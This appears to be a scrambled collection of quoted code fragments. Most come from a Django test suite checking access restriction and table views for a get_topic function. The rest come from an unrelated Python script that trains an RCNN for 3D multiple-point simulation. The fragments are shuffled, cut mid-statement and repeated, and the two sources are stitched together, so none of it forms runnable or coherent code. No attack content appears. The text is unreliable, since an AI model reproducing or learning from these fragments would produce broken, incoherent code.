test_get_topic_with_no_parameters(self): # Setup test another_topic = Topic.objects.create(name='is', desc=\"test", "= self.client.get(url) # Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def", "Faculty.objects.create(name='Test faculty') self.dep = Department.objects.create(name='Test dep') self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac,", "= request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id})) request.user = self.user #", "Exercise test request = self.client.get(url) # Assert test self.assertEqual(200, request.status_code)", "def test_page_load_if_no_profile(self): # Setup test url = reverse('web_user_table') another_user =", "class TableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac", "= get_topic(request, self.dep.id, self.topic.id) # Assert test self.assertEqual(200, response.status_code) def", "# Setup test url = reverse('web_dep_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\")", "get_topic class AccessRestriction(TestCase): def setUp(self): self.user = User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>')", "password=\"<PASSWORD>\") # Exercise test request = self.client.post(url) # Assert test", "def test_return_topic_that_match_user(self): # Setup test request = RequestFactory() request =", "try: response = get_topic(request, self.dep.id, 990) flag = False except", "department=self.dep, faculty=self.fac) def test_page_load_on_get(self): # Setup test url = reverse('web_dep_table')", "django.test import TestCase, RequestFactory from django.http import HttpRequest, Http404 from", "= self.profile self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self): # Setup test request =", "test self.assertTrue(flag) def test_return_topic_that_does_not_exist(self): # Setup test request = RequestFactory()", "try: response = get_topic(request) flag = False except Http404: flag", "# Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html') def test_page_redirect_on_post(self): #", "test_page_redirect_on_post(self): # Setup test url = reverse('web_dep_table') request = self.client.login(username=\"ssss\",", "Assert test self.assertEqual(302, request.status_code) def test_page_redirect_on_no_profile(self): # Setup test user", "faculty=self.fac, department=self.dep) self.topic = Topic.objects.create(name='cs', desc=\"test test test\", faculty=self.fac, term=1)", "Exercise test try: response = get_topic(request, self.dep.id, 990) flag =", "# Exercise test outsider_topic = Topic.objects.create(name='ms', desc=\"test test test\", faculty=self.fac,", "response = get_topic(request, self.dep.id, self.topic.id) # Assert test self.assertEqual(200, response.status_code)", "self.assertTemplateUsed(request, 'tables/table_main.html') def test_page_redirect_on_post(self): # Setup test url = reverse('web_dep_table')", "'topic_id': self.topic.id})) request.user = self.user # Exercise test another_dep =", "request = self.client.login(username=\"test_username\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url)", "setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep", "request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 
'topic_id': self.topic.id})) request.user = self.user # Exercise", "test self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self): # Setup test another_topic = Topic.objects.create(name='is',", "Department.objects.create(faculty=self.fac) self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) def test_page_load_on_get(self): # Setup", "self.topic = Topic.objects.create(name='cs', desc=\"test test test\", faculty=self.fac, term=1) self.topic.department.add(self.dep) self.user.profile", "self.user # Exercise test another_dep = Department.objects.create() try: response =", "from users.models import University, Faculty, Department, UserProfile from cms.models import", "kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id})) request.user = self.user # Exercise test", "self.assertEqual(302, request.status_code) class UserTableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>',", "test request = self.client.get(url) # Assert test self.assertEqual(302, request.status_code) class", "request = RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))", "= reverse('web_dep_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request", "= self.user # Exercise test try: response = get_topic(request, self.dep.id,", "Exercise test response = get_topic(request, self.dep.id, self.topic.id) # Assert test", "department=self.dep) self.topic = Topic.objects.create(name='cs', desc=\"test test test\", faculty=self.fac, term=1) self.topic.department.add(self.dep)", "= True # Assert test self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self): # Setup", "test\", faculty=self.fac, term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request = RequestFactory() request =", "import University, Faculty, Department, UserProfile from cms.models import Topic from", "data = {} request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test", "# Assert test self.assertEqual(302, request.status_code) class UserTableViews(TestCase): def setUp(self): self.user", "Exercise test request = self.client.get(url) # Assert test self.assertEqual(302, request.status_code)", "990) flag = False except Http404: flag = True #", "test request = self.client.get(url) # Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request,", "= User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac)", "request.status_code) class UserTableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>')", "# Setup test request = RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id':", "User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user,", "term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request = RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id':", "Setup test url = reverse('web_user_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") #", 
"another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request = RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id,", "self.assertEqual(200, response.status_code) def test_return_topic_that_has_different_department(self): # Setup test request = RequestFactory()", "self.assertTemplateUsed(request, 'tables/user_table.html') def test_page_load_if_no_profile(self): # Setup test url = reverse('web_user_table')", "self.user.profile = self.profile self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self): # Setup test request", "= self.user # Exercise test response = get_topic(request, self.dep.id, self.topic.id)", "self.topic.id})) request.user = self.user # Exercise test outsider_topic = Topic.objects.create(name='ms',", "outsider_topic.department.add(self.dep) try: response = get_topic(request) flag = False except Http404:", "self.assertEqual(302, request.status_code) def test_page_redirect_on_no_profile(self): # Setup test user = User.objects.create_user(", "faculty') self.dep = Department.objects.create(name='Test dep') self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep)", "def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create()", "email='<EMAIL>', password='<PASSWORD>') self.uni = University.objects.create(name='test_university') self.fac = Faculty.objects.create(name='Test faculty') self.dep", "UserProfile from cms.models import Topic from cms.views import get_topic class", "self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self): # Setup test request = RequestFactory() request", "# Setup test user = User.objects.create_user( username='test_username', email='<EMAIL>', password='<PASSWORD>' )", "class AccessRestriction(TestCase): def setUp(self): self.user = User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>') self.uni", "Assert test self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self): # Setup test another_topic =", "TableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac =", "from django.core.urlresolvers import resolve from django.urls import reverse from django.test", "# Setup test another_topic = Topic.objects.create(name='is', desc=\"test test test\", faculty=self.fac,", "Http404: flag = True # Assert test self.assertTrue(flag) def test_return_topic_that_does_not_exist(self):", "self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request = self.client.post(url, data=data) #", "another_topic = Topic.objects.create(name='is', desc=\"test test test\", faculty=self.fac, term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic)", "from django.http import HttpRequest, Http404 from django.contrib.auth.models import User from", "outsider_topic.id) flag = False except Http404: flag = True #", "Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) self.topic = Topic.objects.create(name='topic", "RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id})) request.user =", "url = reverse('web_user_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # 
Exercise test", "def test_return_topic_that_does_not_exist(self): # Setup test request = RequestFactory() request =", "skip from users.models import University, Faculty, Department, UserProfile from cms.models", "Setup test url = reverse('web_user_table') data = {} request =", "request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request = self.client.post(url)", "test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request, self.dep.id, outsider_topic.id)", "url = reverse('web_dep_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test", "url = reverse('web_user_table') data = {} request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\")", "= UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) def test_page_load_on_get(self): # Setup test url", "reverse from django.test import TestCase, RequestFactory from django.http import HttpRequest,", "Topic.objects.create(name='topic name', desc='ddddd', term=1) self.topic.department.add(self.dep) def test_page_load_on_get(self): # Setup test", "password='<PASSWORD>') self.uni = University.objects.create(name='test_university') self.fac = Faculty.objects.create(name='Test faculty') self.dep =", "self.topic = Topic.objects.create(name='topic name', desc='ddddd', term=1) self.topic.department.add(self.dep) def test_page_load_on_get(self): #", "self.topic.department.add(self.dep) self.user.profile = self.profile self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self): # Setup test", "another_user = User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>') request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") #", "= Topic.objects.create(name='ms', desc=\"test test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response", "password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) self.profile = UserProfile.objects.create(user=self.user,", "= reverse('web_user_table') data = {} request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") #", "self.fac = Faculty.objects.create(name='Test faculty') self.dep = Department.objects.create(name='Test dep') self.profile =", "self.user # Exercise test response = get_topic(request, self.dep.id, self.topic.id) #", "self.topic.id})) request.user = self.user # Exercise test response = get_topic(request,", "except Http404: flag = True # Assert test self.assertTrue(flag) def", "Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) self.topic = Topic.objects.create(name='topic name', desc='ddddd', term=1)", "# Exercise test try: response = get_topic(request, self.dep.id, 990) flag", "cms.models import Topic from cms.views import get_topic class AccessRestriction(TestCase): def", "get_topic(request, self.dep.id, 990) flag = False except Http404: flag =", "# Assert test self.assertTrue(flag) def test_return_topic_that_does_not_exist(self): # Setup test request", "'topic_id': self.topic.id})) request.user = self.user # Exercise test outsider_topic =", "email='<EMAIL>', password='<PASSWORD>' ) url = reverse('web_dep_table') request = self.client.login(username=\"test_username\", password=\"<PASSWORD>\")", "request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request = self.client.post(url,", 
"self.client.get(url) # Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html') def test_page_redirect_on_post(self):", "import User from unittest import skip from users.models import University,", "reverse('web_user_table') data = {} request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise", "Http404: flag = True # Assert test self.assertTrue(flag) def test_get_topic_with_no_parameters(self):", "response.status_code) def test_return_topic_that_has_different_department(self): # Setup test request = RequestFactory() request", "self.client.get(url) # Assert test self.assertEqual(302, request.status_code) class UserTableViews(TestCase): def setUp(self):", "Assert test self.assertEqual(302, request.status_code) class UserTableViews(TestCase): def setUp(self): self.user =", "test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html') def test_page_redirect_on_post(self): # Setup test", "def test_post_when_no_choices(self): # Setup test url = reverse('web_user_table') data =", "def test_return_topic_that_has_different_department(self): # Setup test request = RequestFactory() request =", "test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request) flag =", "django.contrib.auth.models import User from unittest import skip from users.models import", "Http404: flag = True # Assert test self.assertTrue(flag) class TableViews(TestCase):", "Topic.objects.create(name='is', desc=\"test test test\", faculty=self.fac, term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request =" ]
[ "numpy as np import tensorflow as tf import time import", "import device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ##", "IPsizex - Num 6 HyperPar.append(int(7)) # IPsizey - Num 7", "StepLR = 10 PointStart = 1 for indTrain in range(Ncicles):", "It has been developed by <NAME> and <NAME> in the", "code is the Version 1.0 of the RCNN approach to", "- Num 3 HyperPar.append(int(7)) # Search_y - Num 4 HyperPar.append(int(7))", "\"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles = 500 Nepoch = 1 #Nbatch", "TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples,", "whole training process-\" % (np.around((time.time() - start_time_1), decimals=2))) gc.collect() print(\"", "HyperPar.append(50) # SGsizez - Num 2 HyperPar.append(int(7)) # Search_x -", "print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch,", "gc for ind0 in range(1): start_time_AllTrain = time.time() HyperPar =", "- Num 7 HyperPar.append(int(7)) # IPsizez - Num 8 HyperPar.append(50)", "print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) # To save the TI", "Training=True, Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart))", "+ MinLR, decimals=7) else: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*(StepLR -", "been developed by <NAME> and <NAME> in the Geometallurygical Group", "of categories - Num 14 print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \",", "LR=LearningRate) print(\"--%s seconds of whole training process-\" % (np.around((time.time() -", "University - Canada\"\"\" # Do not display the AVX message", "- Num 6 HyperPar.append(int(7)) # IPsizey - Num 7 HyperPar.append(int(7))", "Conditioning - Num 9 .. 
divided by 3 so 1%", "Plot=True) print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate)", "print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate) print(\"--%s", "categories - Num 14 print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8]))", "Fully Connected - Num 11 HyperPar.append(3) # wdnh - Num", "250 Nsamples = 512 TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]),", "#LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar,", "HyperPar.append(16) # convdepth - Num 13 HyperPar.append(2) # num of", "- Num 14 print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles", "Num 10 HyperPar.append(1500) # Num Fully Connected - Num 11", "device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## #########################", "#os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## ######################### import numpy", "cuos) + MaxLR, decimals=7) start_time_1 = time.time() print (\"Cicle: {}\".format(indTrain+PointStart),", "convdepth - Num 13 HyperPar.append(2) # num of categories -", "HyperPar.append(50) # Percentage of Data Conditioning - Num 9 ..", "represents 1% HyperPar.append(1) # MinDC - Num 10 HyperPar.append(1500) #", "Version 1.0 of the RCNN approach to perform MPS in", "decimals=7) start_time_1 = time.time() print (\"Cicle: {}\".format(indTrain+PointStart), \"Learning Rate: \",", "2 HyperPar.append(int(7)) # Search_x - Num 3 HyperPar.append(int(7)) # Search_y", "= indTrain%(2*StepLR) if cuos < StepLR: LearningRate = np.around(((MaxLR -", "Geomet Group - Queen's University - Canada\"\"\" # Do not", "[] HyperPar.append(50) # SGsizex - Num 0 HyperPar.append(50) # SGsizey", "RCNN approach to perform MPS in 3D for categorical variables.", "comments and further improvements are well recevied to: <EMAIL> April", "# IPsizex - Num 6 HyperPar.append(int(7)) # IPsizey - Num", "TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate) print(\"--%s seconds of", "cuos = indTrain%(2*StepLR) if cuos < StepLR: LearningRate = np.around(((MaxLR", "using GPU import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' #from tensorflow.python.client import", "- Num 12 
HyperPar.append(16) # convdepth - Num 13 HyperPar.append(2)", "<NAME> in the Geometallurygical Group at Queen's University as part", "Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\")", "1 HyperPar.append(50) # SGsizez - Num 2 HyperPar.append(int(7)) # Search_x", "Lvl=5, Training=True, Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile,", "np.random.randint(41)+10 cuos = indTrain%(2*StepLR) if cuos < StepLR: LearningRate =", "np.around(((MaxLR - MinLR)/StepLR)*(StepLR - cuos) + MaxLR, decimals=7) start_time_1 =", "MaxLR, MinLR = 0.01, 0.001 StepLR = 10 PointStart =", "range(1): start_time_AllTrain = time.time() HyperPar = [] HyperPar.append(50) # SGsizex", "# MinDC - Num 10 HyperPar.append(1500) # Num Fully Connected", "= np.around(((MaxLR - MinLR)/StepLR)*(StepLR - cuos) + MaxLR, decimals=7) start_time_1", "LearningRate = np.around(((MaxLR - MinLR)/StepLR)*cuos + MinLR, decimals=7) else: LearningRate", "of a PhD program. The code is not free of", "fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) # To save the TI TempSimGrid = fns_nested.Grid(HyperPar=HyperPar,", "# Num Fully Connected - Num 11 HyperPar.append(3) # wdnh", "LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]),", "GPU import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' #from tensorflow.python.client import device_lib", "1% HyperPar.append(1) # MinDC - Num 10 HyperPar.append(1500) # Num", "# SGsizey - Num 1 HyperPar.append(50) # SGsizez - Num", "AVX message about using GPU import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'", "import numpy as np import tensorflow as tf import time", "Queen's University as part of a PhD program. 
The code", "######################### import numpy as np import tensorflow as tf import", "4 HyperPar.append(int(7)) # Search_z - Num 5 HyperPar.append(int(7)) # IPsizex", "7 HyperPar.append(int(7)) # IPsizez - Num 8 HyperPar.append(50) # Percentage", "# see issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## ######################### import numpy as", "start_time_AllTrain = time.time() HyperPar = [] HyperPar.append(50) # SGsizex -", "wdnh - Num 12 HyperPar.append(16) # convdepth - Num 13", "as np import tensorflow as tf import time import External_Functions_3D", "indTrain in range(Ncicles): #HyperPar[9] = np.random.randint(41)+10 cuos = indTrain%(2*StepLR) if", "#fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) # To save the TI TempSimGrid", "500 Nepoch = 1 #Nbatch = 250 Nsamples = 512", "Group at Queen's University as part of a PhD program.", "in range(Ncicles): #HyperPar[9] = np.random.randint(41)+10 cuos = indTrain%(2*StepLR) if cuos", "= 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]),", "'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar,", "Search_y - Num 4 HyperPar.append(int(7)) # Search_z - Num 5", "Num 5 HyperPar.append(int(7)) # IPsizex - Num 6 HyperPar.append(int(7)) #", "IPsizey - Num 7 HyperPar.append(int(7)) # IPsizez - Num 8", "# Search_z - Num 5 HyperPar.append(int(7)) # IPsizex - Num", "13 HyperPar.append(2) # num of categories - Num 14 print(\"SG:", "PhD program. 
The code is not free of bugs but", "by <NAME> and <NAME> in the Geometallurygical Group at Queen's", "Canada\"\"\" # Do not display the AVX message about using", "for ind0 in range(1): start_time_AllTrain = time.time() HyperPar = []", "- start_time_1), decimals=2))) gc.collect() print(\" \") print(\"--%s minutes of ALL", "Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel,", "int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile", "Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate) print(\"--%s seconds", "developed by <NAME> and <NAME> in the Geometallurygical Group at", "# Percentage of Data Conditioning - Num 9 .. divided", "LocModel=LocModel, LR=LearningRate) print(\"--%s seconds of whole training process-\" % (np.around((time.time()", "else: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*(StepLR - cuos) + MaxLR,", "import External_Functions_3D as fns_nested import gc for ind0 in range(1):", "{}\".format(indTrain+PointStart), \"Learning Rate: \", LearningRate) TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5,", "TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True, Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart),", "issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## ######################### import numpy as np import", "= 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]),", "int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel)", "to: <EMAIL> April 16, 2019. Geomet Group - Queen's University", "- Num 10 HyperPar.append(1500) # Num Fully Connected - Num", "bugs but running end-to-end. Any comments and further improvements are", "#from tensorflow.python.client import device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152", "at Queen's University as part of a PhD program. 
